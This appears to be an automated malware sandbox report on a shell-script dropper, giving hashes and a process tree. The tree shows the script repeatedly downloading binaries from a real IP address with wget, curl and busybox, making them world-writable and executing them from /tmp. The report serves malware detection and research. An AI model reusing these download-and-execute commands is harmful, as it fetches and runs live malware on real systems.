Analysis
-
max time kernel
27s -
max time network
128s -
platform
ubuntu-18.04_amd64 -
resource
ubuntu1804-amd64-20240611-en -
resource tags
arch:amd64 arch:i386 image:ubuntu1804-amd64-20240611-en kernel:4.15.0-213-generic locale:en-us os:ubuntu-18.04-amd64 system -
submitted
25/10/2024, 01:33
Static task
static1
Behavioral task
behavioral1
Sample
506d219f79f14db0465b4833a623725c830e0a6630fe266a075de7af41011264.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
506d219f79f14db0465b4833a623725c830e0a6630fe266a075de7af41011264.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
506d219f79f14db0465b4833a623725c830e0a6630fe266a075de7af41011264.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
506d219f79f14db0465b4833a623725c830e0a6630fe266a075de7af41011264.sh
Resource
debian9-mipsel-20240226-en
General
-
Target
506d219f79f14db0465b4833a623725c830e0a6630fe266a075de7af41011264.sh
-
Size
10KB
-
MD5
766dedc13963c6b6ee0d4904bf619106
-
SHA1
3b93a1c4a9df4d54c75ef3b445ca55244506866c
-
SHA256
506d219f79f14db0465b4833a623725c830e0a6630fe266a075de7af41011264
-
SHA512
708c383986fa3596893356ad7ced7c503f4bdab762a319ff71291af63bf23e29ce72ae833bc4f47293c9031f7b78bc55a6a61f9d67585f39fb2412103eb6875b
-
SSDEEP
192:jbYbCQCoCnCuCKCzIkq3VdEZ1KVdEZ1PCQCoCnCuCKCEt:/YbCQCoCnCuCKCzIkqWCQCoCnCuCKCQ
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 28 IoCs
Adversaries may modify file or directory permissions to evade defenses.
-
Executes dropped EXE 28 IoCs
-
Writes file to tmp directory 28 IoCs
Malware often drops required files in the /tmp directory.
Processes
-
/tmp/506d219f79f14db0465b4833a623725c830e0a6630fe266a075de7af41011264.sh/tmp/506d219f79f14db0465b4833a623725c830e0a6630fe266a075de7af41011264.sh1⤵PID:1486
-
/bin/rm/bin/rm bins.sh2⤵PID:1487
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/UCTHLRDDehvmNDeQqd2FH0jqUohDghvHWW2⤵PID:1488
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/UCTHLRDDehvmNDeQqd2FH0jqUohDghvHWW2⤵
- Writes file to tmp directory
PID:1493
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/UCTHLRDDehvmNDeQqd2FH0jqUohDghvHWW2⤵PID:1494
-
-
/bin/chmodchmod 777 UCTHLRDDehvmNDeQqd2FH0jqUohDghvHWW2⤵
- File and Directory Permissions Modification
PID:1495
-
-
/tmp/UCTHLRDDehvmNDeQqd2FH0jqUohDghvHWW./UCTHLRDDehvmNDeQqd2FH0jqUohDghvHWW2⤵
- Executes dropped EXE
PID:1496
-
-
/bin/rmrm UCTHLRDDehvmNDeQqd2FH0jqUohDghvHWW2⤵PID:1497
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/SXxs5GFac5y22CZnJWmqEr3DmeX45PCayc2⤵PID:1498
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/SXxs5GFac5y22CZnJWmqEr3DmeX45PCayc2⤵
- Writes file to tmp directory
PID:1499
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/SXxs5GFac5y22CZnJWmqEr3DmeX45PCayc2⤵PID:1500
-
-
/bin/chmodchmod 777 SXxs5GFac5y22CZnJWmqEr3DmeX45PCayc2⤵
- File and Directory Permissions Modification
PID:1501
-
-
/tmp/SXxs5GFac5y22CZnJWmqEr3DmeX45PCayc./SXxs5GFac5y22CZnJWmqEr3DmeX45PCayc2⤵
- Executes dropped EXE
PID:1502
-
-
/bin/rmrm SXxs5GFac5y22CZnJWmqEr3DmeX45PCayc2⤵PID:1503
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/LPaC2eJSRhuKBsEebLyyc29CdaQjGdCXFt2⤵PID:1504
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/LPaC2eJSRhuKBsEebLyyc29CdaQjGdCXFt2⤵
- Writes file to tmp directory
PID:1505
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/LPaC2eJSRhuKBsEebLyyc29CdaQjGdCXFt2⤵PID:1506
-
-
/bin/chmodchmod 777 LPaC2eJSRhuKBsEebLyyc29CdaQjGdCXFt2⤵
- File and Directory Permissions Modification
PID:1507
-
-
/tmp/LPaC2eJSRhuKBsEebLyyc29CdaQjGdCXFt./LPaC2eJSRhuKBsEebLyyc29CdaQjGdCXFt2⤵
- Executes dropped EXE
PID:1508
-
-
/bin/rmrm LPaC2eJSRhuKBsEebLyyc29CdaQjGdCXFt2⤵PID:1509
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/LD7aFIZkwpYfOzQhLZQITHyUYxNh7m25172⤵PID:1510
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/LD7aFIZkwpYfOzQhLZQITHyUYxNh7m25172⤵
- Writes file to tmp directory
PID:1511
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/LD7aFIZkwpYfOzQhLZQITHyUYxNh7m25172⤵PID:1512
-
-
/bin/chmodchmod 777 LD7aFIZkwpYfOzQhLZQITHyUYxNh7m25172⤵
- File and Directory Permissions Modification
PID:1513
-
-
/tmp/LD7aFIZkwpYfOzQhLZQITHyUYxNh7m2517./LD7aFIZkwpYfOzQhLZQITHyUYxNh7m25172⤵
- Executes dropped EXE
PID:1514
-
-
/bin/rmrm LD7aFIZkwpYfOzQhLZQITHyUYxNh7m25172⤵PID:1515
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/2rOBjn4n3qVx8hT8I1rUyTOfwjnF6IzSYT2⤵PID:1516
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/2rOBjn4n3qVx8hT8I1rUyTOfwjnF6IzSYT2⤵
- Writes file to tmp directory
PID:1517
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/2rOBjn4n3qVx8hT8I1rUyTOfwjnF6IzSYT2⤵PID:1518
-
-
/bin/chmodchmod 777 2rOBjn4n3qVx8hT8I1rUyTOfwjnF6IzSYT2⤵
- File and Directory Permissions Modification
PID:1519
-
-
/tmp/2rOBjn4n3qVx8hT8I1rUyTOfwjnF6IzSYT./2rOBjn4n3qVx8hT8I1rUyTOfwjnF6IzSYT2⤵
- Executes dropped EXE
PID:1520
-
-
/bin/rmrm 2rOBjn4n3qVx8hT8I1rUyTOfwjnF6IzSYT2⤵PID:1521
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/iA4eNeQirh7GZpHp5Vog6PJMrzdJt71Sal2⤵PID:1522
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/iA4eNeQirh7GZpHp5Vog6PJMrzdJt71Sal2⤵
- Writes file to tmp directory
PID:1523
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/iA4eNeQirh7GZpHp5Vog6PJMrzdJt71Sal2⤵PID:1524
-
-
/bin/chmodchmod 777 iA4eNeQirh7GZpHp5Vog6PJMrzdJt71Sal2⤵
- File and Directory Permissions Modification
PID:1525
-
-
/tmp/iA4eNeQirh7GZpHp5Vog6PJMrzdJt71Sal./iA4eNeQirh7GZpHp5Vog6PJMrzdJt71Sal2⤵
- Executes dropped EXE
PID:1526
-
-
/bin/rmrm iA4eNeQirh7GZpHp5Vog6PJMrzdJt71Sal2⤵PID:1527
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/TZXKJ5jLshQIvtt7BTjJP8ZQwqfoF4Bb622⤵PID:1528
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/TZXKJ5jLshQIvtt7BTjJP8ZQwqfoF4Bb622⤵
- Writes file to tmp directory
PID:1529
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/TZXKJ5jLshQIvtt7BTjJP8ZQwqfoF4Bb622⤵PID:1530
-
-
/bin/chmodchmod 777 TZXKJ5jLshQIvtt7BTjJP8ZQwqfoF4Bb622⤵
- File and Directory Permissions Modification
PID:1531
-
-
/tmp/TZXKJ5jLshQIvtt7BTjJP8ZQwqfoF4Bb62./TZXKJ5jLshQIvtt7BTjJP8ZQwqfoF4Bb622⤵
- Executes dropped EXE
PID:1532
-
-
/bin/rmrm TZXKJ5jLshQIvtt7BTjJP8ZQwqfoF4Bb622⤵PID:1533
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/YtfqXTLPZogR4uWDjORFeCOUe06n5LGEC12⤵PID:1534
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/YtfqXTLPZogR4uWDjORFeCOUe06n5LGEC12⤵
- Writes file to tmp directory
PID:1535
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/YtfqXTLPZogR4uWDjORFeCOUe06n5LGEC12⤵PID:1536
-
-
/bin/chmodchmod 777 YtfqXTLPZogR4uWDjORFeCOUe06n5LGEC12⤵
- File and Directory Permissions Modification
PID:1537
-
-
/tmp/YtfqXTLPZogR4uWDjORFeCOUe06n5LGEC1./YtfqXTLPZogR4uWDjORFeCOUe06n5LGEC12⤵
- Executes dropped EXE
PID:1538
-
-
/bin/rmrm YtfqXTLPZogR4uWDjORFeCOUe06n5LGEC12⤵PID:1539
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/jcwbKsx7INVOgy5Cypj6cJaEClnzoCxQQV2⤵PID:1540
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/jcwbKsx7INVOgy5Cypj6cJaEClnzoCxQQV2⤵
- Writes file to tmp directory
PID:1541
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/jcwbKsx7INVOgy5Cypj6cJaEClnzoCxQQV2⤵PID:1542
-
-
/bin/chmodchmod 777 jcwbKsx7INVOgy5Cypj6cJaEClnzoCxQQV2⤵
- File and Directory Permissions Modification
PID:1543
-
-
/tmp/jcwbKsx7INVOgy5Cypj6cJaEClnzoCxQQV./jcwbKsx7INVOgy5Cypj6cJaEClnzoCxQQV2⤵
- Executes dropped EXE
PID:1544
-
-
/bin/rmrm jcwbKsx7INVOgy5Cypj6cJaEClnzoCxQQV2⤵PID:1545
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/51UHlyi6CpBPnsKOe0Ak7QO10WH752QyFB2⤵PID:1546
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/51UHlyi6CpBPnsKOe0Ak7QO10WH752QyFB2⤵
- Writes file to tmp directory
PID:1547
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/51UHlyi6CpBPnsKOe0Ak7QO10WH752QyFB2⤵PID:1548
-
-
/bin/chmodchmod 777 51UHlyi6CpBPnsKOe0Ak7QO10WH752QyFB2⤵
- File and Directory Permissions Modification
PID:1549
-
-
/tmp/51UHlyi6CpBPnsKOe0Ak7QO10WH752QyFB./51UHlyi6CpBPnsKOe0Ak7QO10WH752QyFB2⤵
- Executes dropped EXE
PID:1550
-
-
/bin/rmrm 51UHlyi6CpBPnsKOe0Ak7QO10WH752QyFB2⤵PID:1551
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/6fIuSLaEdhrpZduQ3q8VWdFNf0YZBoHGcF2⤵PID:1552
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/6fIuSLaEdhrpZduQ3q8VWdFNf0YZBoHGcF2⤵
- Writes file to tmp directory
PID:1553
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/6fIuSLaEdhrpZduQ3q8VWdFNf0YZBoHGcF2⤵PID:1554
-
-
/bin/chmodchmod 777 6fIuSLaEdhrpZduQ3q8VWdFNf0YZBoHGcF2⤵
- File and Directory Permissions Modification
PID:1555
-
-
/tmp/6fIuSLaEdhrpZduQ3q8VWdFNf0YZBoHGcF./6fIuSLaEdhrpZduQ3q8VWdFNf0YZBoHGcF2⤵
- Executes dropped EXE
PID:1556
-
-
/bin/rmrm 6fIuSLaEdhrpZduQ3q8VWdFNf0YZBoHGcF2⤵PID:1557
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/LEN2oHcPC1EXOmtdw8ObBv76IXcaGyW21U2⤵PID:1558
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/LEN2oHcPC1EXOmtdw8ObBv76IXcaGyW21U2⤵
- Writes file to tmp directory
PID:1559
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/LEN2oHcPC1EXOmtdw8ObBv76IXcaGyW21U2⤵PID:1560
-
-
/bin/chmodchmod 777 LEN2oHcPC1EXOmtdw8ObBv76IXcaGyW21U2⤵
- File and Directory Permissions Modification
PID:1561
-
-
/tmp/LEN2oHcPC1EXOmtdw8ObBv76IXcaGyW21U./LEN2oHcPC1EXOmtdw8ObBv76IXcaGyW21U2⤵
- Executes dropped EXE
PID:1562
-
-
/bin/rmrm LEN2oHcPC1EXOmtdw8ObBv76IXcaGyW21U2⤵PID:1563
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/sqyCJQVXqgnToECHZpDmPrSMRFMB7mDMES2⤵PID:1564
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/sqyCJQVXqgnToECHZpDmPrSMRFMB7mDMES2⤵
- Writes file to tmp directory
PID:1565
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/sqyCJQVXqgnToECHZpDmPrSMRFMB7mDMES2⤵PID:1566
-
-
/bin/chmodchmod 777 sqyCJQVXqgnToECHZpDmPrSMRFMB7mDMES2⤵
- File and Directory Permissions Modification
PID:1567
-
-
/tmp/sqyCJQVXqgnToECHZpDmPrSMRFMB7mDMES./sqyCJQVXqgnToECHZpDmPrSMRFMB7mDMES2⤵
- Executes dropped EXE
PID:1568
-
-
/bin/rmrm sqyCJQVXqgnToECHZpDmPrSMRFMB7mDMES2⤵PID:1569
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/KeW92ny8kVqLl4usfbwmgKxREiCtAc5GHB2⤵PID:1570
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/KeW92ny8kVqLl4usfbwmgKxREiCtAc5GHB2⤵
- Writes file to tmp directory
PID:1571
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/KeW92ny8kVqLl4usfbwmgKxREiCtAc5GHB2⤵PID:1572
-
-
/bin/chmodchmod 777 KeW92ny8kVqLl4usfbwmgKxREiCtAc5GHB2⤵
- File and Directory Permissions Modification
PID:1573
-
-
/tmp/KeW92ny8kVqLl4usfbwmgKxREiCtAc5GHB./KeW92ny8kVqLl4usfbwmgKxREiCtAc5GHB2⤵
- Executes dropped EXE
PID:1574
-
-
/bin/rmrm KeW92ny8kVqLl4usfbwmgKxREiCtAc5GHB2⤵PID:1575
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/51UHlyi6CpBPnsKOe0Ak7QO10WH752QyFB2⤵PID:1576
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/51UHlyi6CpBPnsKOe0Ak7QO10WH752QyFB2⤵
- Writes file to tmp directory
PID:1577
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/51UHlyi6CpBPnsKOe0Ak7QO10WH752QyFB2⤵PID:1578
-
-
/bin/chmodchmod 777 51UHlyi6CpBPnsKOe0Ak7QO10WH752QyFB2⤵
- File and Directory Permissions Modification
PID:1579
-
-
/tmp/51UHlyi6CpBPnsKOe0Ak7QO10WH752QyFB./51UHlyi6CpBPnsKOe0Ak7QO10WH752QyFB2⤵
- Executes dropped EXE
PID:1580
-
-
/bin/rmrm 51UHlyi6CpBPnsKOe0Ak7QO10WH752QyFB2⤵PID:1581
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/iA4eNeQirh7GZpHp5Vog6PJMrzdJt71Sal2⤵PID:1582
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/iA4eNeQirh7GZpHp5Vog6PJMrzdJt71Sal2⤵
- Writes file to tmp directory
PID:1583
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/iA4eNeQirh7GZpHp5Vog6PJMrzdJt71Sal2⤵PID:1584
-
-
/bin/chmodchmod 777 iA4eNeQirh7GZpHp5Vog6PJMrzdJt71Sal2⤵
- File and Directory Permissions Modification
PID:1585
-
-
/tmp/iA4eNeQirh7GZpHp5Vog6PJMrzdJt71Sal./iA4eNeQirh7GZpHp5Vog6PJMrzdJt71Sal2⤵
- Executes dropped EXE
PID:1586
-
-
/bin/rmrm iA4eNeQirh7GZpHp5Vog6PJMrzdJt71Sal2⤵PID:1587
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/TZXKJ5jLshQIvtt7BTjJP8ZQwqfoF4Bb622⤵PID:1588
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/TZXKJ5jLshQIvtt7BTjJP8ZQwqfoF4Bb622⤵
- Writes file to tmp directory
PID:1589
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/TZXKJ5jLshQIvtt7BTjJP8ZQwqfoF4Bb622⤵PID:1590
-
-
/bin/chmodchmod 777 TZXKJ5jLshQIvtt7BTjJP8ZQwqfoF4Bb622⤵
- File and Directory Permissions Modification
PID:1591
-
-
/tmp/TZXKJ5jLshQIvtt7BTjJP8ZQwqfoF4Bb62./TZXKJ5jLshQIvtt7BTjJP8ZQwqfoF4Bb622⤵
- Executes dropped EXE
PID:1592
-
-
/bin/rmrm TZXKJ5jLshQIvtt7BTjJP8ZQwqfoF4Bb622⤵PID:1593
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/YtfqXTLPZogR4uWDjORFeCOUe06n5LGEC12⤵PID:1594
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/YtfqXTLPZogR4uWDjORFeCOUe06n5LGEC12⤵
- Writes file to tmp directory
PID:1595
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/YtfqXTLPZogR4uWDjORFeCOUe06n5LGEC12⤵PID:1596
-
-
/bin/chmodchmod 777 YtfqXTLPZogR4uWDjORFeCOUe06n5LGEC12⤵
- File and Directory Permissions Modification
PID:1597
-
-
/tmp/YtfqXTLPZogR4uWDjORFeCOUe06n5LGEC1./YtfqXTLPZogR4uWDjORFeCOUe06n5LGEC12⤵
- Executes dropped EXE
PID:1598
-
-
/bin/rmrm YtfqXTLPZogR4uWDjORFeCOUe06n5LGEC12⤵PID:1599
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/jcwbKsx7INVOgy5Cypj6cJaEClnzoCxQQV2⤵PID:1600
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/jcwbKsx7INVOgy5Cypj6cJaEClnzoCxQQV2⤵
- Writes file to tmp directory
PID:1601
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/jcwbKsx7INVOgy5Cypj6cJaEClnzoCxQQV2⤵PID:1602
-
-
/bin/chmodchmod 777 jcwbKsx7INVOgy5Cypj6cJaEClnzoCxQQV2⤵
- File and Directory Permissions Modification
PID:1603
-
-
/tmp/jcwbKsx7INVOgy5Cypj6cJaEClnzoCxQQV./jcwbKsx7INVOgy5Cypj6cJaEClnzoCxQQV2⤵
- Executes dropped EXE
PID:1604
-
-
/bin/rmrm jcwbKsx7INVOgy5Cypj6cJaEClnzoCxQQV2⤵PID:1605
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/LEN2oHcPC1EXOmtdw8ObBv76IXcaGyW21U2⤵PID:1606
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/LEN2oHcPC1EXOmtdw8ObBv76IXcaGyW21U2⤵
- Writes file to tmp directory
PID:1607
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/LEN2oHcPC1EXOmtdw8ObBv76IXcaGyW21U2⤵PID:1608
-
-
/bin/chmodchmod 777 LEN2oHcPC1EXOmtdw8ObBv76IXcaGyW21U2⤵
- File and Directory Permissions Modification
PID:1609
-
-
/tmp/LEN2oHcPC1EXOmtdw8ObBv76IXcaGyW21U./LEN2oHcPC1EXOmtdw8ObBv76IXcaGyW21U2⤵
- Executes dropped EXE
PID:1610
-
-
/bin/rmrm LEN2oHcPC1EXOmtdw8ObBv76IXcaGyW21U2⤵PID:1611
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/6fIuSLaEdhrpZduQ3q8VWdFNf0YZBoHGcF2⤵PID:1612
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/6fIuSLaEdhrpZduQ3q8VWdFNf0YZBoHGcF2⤵
- Writes file to tmp directory
PID:1613
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/6fIuSLaEdhrpZduQ3q8VWdFNf0YZBoHGcF2⤵PID:1614
-
-
/bin/chmodchmod 777 6fIuSLaEdhrpZduQ3q8VWdFNf0YZBoHGcF2⤵
- File and Directory Permissions Modification
PID:1615
-
-
/tmp/6fIuSLaEdhrpZduQ3q8VWdFNf0YZBoHGcF./6fIuSLaEdhrpZduQ3q8VWdFNf0YZBoHGcF2⤵
- Executes dropped EXE
PID:1616
-
-
/bin/rmrm 6fIuSLaEdhrpZduQ3q8VWdFNf0YZBoHGcF2⤵PID:1617
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/KeW92ny8kVqLl4usfbwmgKxREiCtAc5GHB2⤵PID:1618
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/KeW92ny8kVqLl4usfbwmgKxREiCtAc5GHB2⤵
- Writes file to tmp directory
PID:1619
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/KeW92ny8kVqLl4usfbwmgKxREiCtAc5GHB2⤵PID:1620
-
-
/bin/chmodchmod 777 KeW92ny8kVqLl4usfbwmgKxREiCtAc5GHB2⤵
- File and Directory Permissions Modification
PID:1621
-
-
/tmp/KeW92ny8kVqLl4usfbwmgKxREiCtAc5GHB./KeW92ny8kVqLl4usfbwmgKxREiCtAc5GHB2⤵
- Executes dropped EXE
PID:1622
-
-
/bin/rmrm KeW92ny8kVqLl4usfbwmgKxREiCtAc5GHB2⤵PID:1623
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/sqyCJQVXqgnToECHZpDmPrSMRFMB7mDMES2⤵PID:1624
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/sqyCJQVXqgnToECHZpDmPrSMRFMB7mDMES2⤵
- Writes file to tmp directory
PID:1625
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/sqyCJQVXqgnToECHZpDmPrSMRFMB7mDMES2⤵PID:1626
-
-
/bin/chmodchmod 777 sqyCJQVXqgnToECHZpDmPrSMRFMB7mDMES2⤵
- File and Directory Permissions Modification
PID:1627
-
-
/tmp/sqyCJQVXqgnToECHZpDmPrSMRFMB7mDMES./sqyCJQVXqgnToECHZpDmPrSMRFMB7mDMES2⤵
- Executes dropped EXE
PID:1628
-
-
/bin/rmrm sqyCJQVXqgnToECHZpDmPrSMRFMB7mDMES2⤵PID:1629
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/2rOBjn4n3qVx8hT8I1rUyTOfwjnF6IzSYT2⤵PID:1630
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/2rOBjn4n3qVx8hT8I1rUyTOfwjnF6IzSYT2⤵
- Writes file to tmp directory
PID:1631
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/2rOBjn4n3qVx8hT8I1rUyTOfwjnF6IzSYT2⤵PID:1632
-
-
/bin/chmodchmod 777 2rOBjn4n3qVx8hT8I1rUyTOfwjnF6IzSYT2⤵
- File and Directory Permissions Modification
PID:1633
-
-
/tmp/2rOBjn4n3qVx8hT8I1rUyTOfwjnF6IzSYT./2rOBjn4n3qVx8hT8I1rUyTOfwjnF6IzSYT2⤵
- Executes dropped EXE
PID:1634
-
-
/bin/rmrm 2rOBjn4n3qVx8hT8I1rUyTOfwjnF6IzSYT2⤵PID:1635
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/UCTHLRDDehvmNDeQqd2FH0jqUohDghvHWW2⤵PID:1636
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/UCTHLRDDehvmNDeQqd2FH0jqUohDghvHWW2⤵
- Writes file to tmp directory
PID:1637
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/UCTHLRDDehvmNDeQqd2FH0jqUohDghvHWW2⤵PID:1638
-
-
/bin/chmodchmod 777 UCTHLRDDehvmNDeQqd2FH0jqUohDghvHWW2⤵
- File and Directory Permissions Modification
PID:1639
-
-
/tmp/UCTHLRDDehvmNDeQqd2FH0jqUohDghvHWW./UCTHLRDDehvmNDeQqd2FH0jqUohDghvHWW2⤵
- Executes dropped EXE
PID:1640
-
-
/bin/rmrm UCTHLRDDehvmNDeQqd2FH0jqUohDghvHWW2⤵PID:1641
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/SXxs5GFac5y22CZnJWmqEr3DmeX45PCayc2⤵PID:1642
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/SXxs5GFac5y22CZnJWmqEr3DmeX45PCayc2⤵
- Writes file to tmp directory
PID:1643
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/SXxs5GFac5y22CZnJWmqEr3DmeX45PCayc2⤵PID:1644
-
-
/bin/chmodchmod 777 SXxs5GFac5y22CZnJWmqEr3DmeX45PCayc2⤵
- File and Directory Permissions Modification
PID:1645
-
-
/tmp/SXxs5GFac5y22CZnJWmqEr3DmeX45PCayc./SXxs5GFac5y22CZnJWmqEr3DmeX45PCayc2⤵
- Executes dropped EXE
PID:1646
-
-
/bin/rmrm SXxs5GFac5y22CZnJWmqEr3DmeX45PCayc2⤵PID:1647
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/LPaC2eJSRhuKBsEebLyyc29CdaQjGdCXFt2⤵PID:1648
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/LPaC2eJSRhuKBsEebLyyc29CdaQjGdCXFt2⤵
- Writes file to tmp directory
PID:1649
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/LPaC2eJSRhuKBsEebLyyc29CdaQjGdCXFt2⤵PID:1650
-
-
/bin/chmodchmod 777 LPaC2eJSRhuKBsEebLyyc29CdaQjGdCXFt2⤵
- File and Directory Permissions Modification
PID:1651
-
-
/tmp/LPaC2eJSRhuKBsEebLyyc29CdaQjGdCXFt./LPaC2eJSRhuKBsEebLyyc29CdaQjGdCXFt2⤵
- Executes dropped EXE
PID:1652
-
-
/bin/rmrm LPaC2eJSRhuKBsEebLyyc29CdaQjGdCXFt2⤵PID:1653
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/LD7aFIZkwpYfOzQhLZQITHyUYxNh7m25172⤵PID:1654
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/LD7aFIZkwpYfOzQhLZQITHyUYxNh7m25172⤵
- Writes file to tmp directory
PID:1655
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/LD7aFIZkwpYfOzQhLZQITHyUYxNh7m25172⤵PID:1656
-
-
/bin/chmodchmod 777 LD7aFIZkwpYfOzQhLZQITHyUYxNh7m25172⤵
- File and Directory Permissions Modification
PID:1657
-
-
/tmp/LD7aFIZkwpYfOzQhLZQITHyUYxNh7m2517./LD7aFIZkwpYfOzQhLZQITHyUYxNh7m25172⤵
- Executes dropped EXE
PID:1658
-
-
/bin/rmrm LD7aFIZkwpYfOzQhLZQITHyUYxNh7m25172⤵PID:1659
-
Network
MITRE ATT&CK Enterprise v15
Downloads
-
Filesize
153B
MD5 998368d7c95ea4293237f2320546e440
SHA1 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97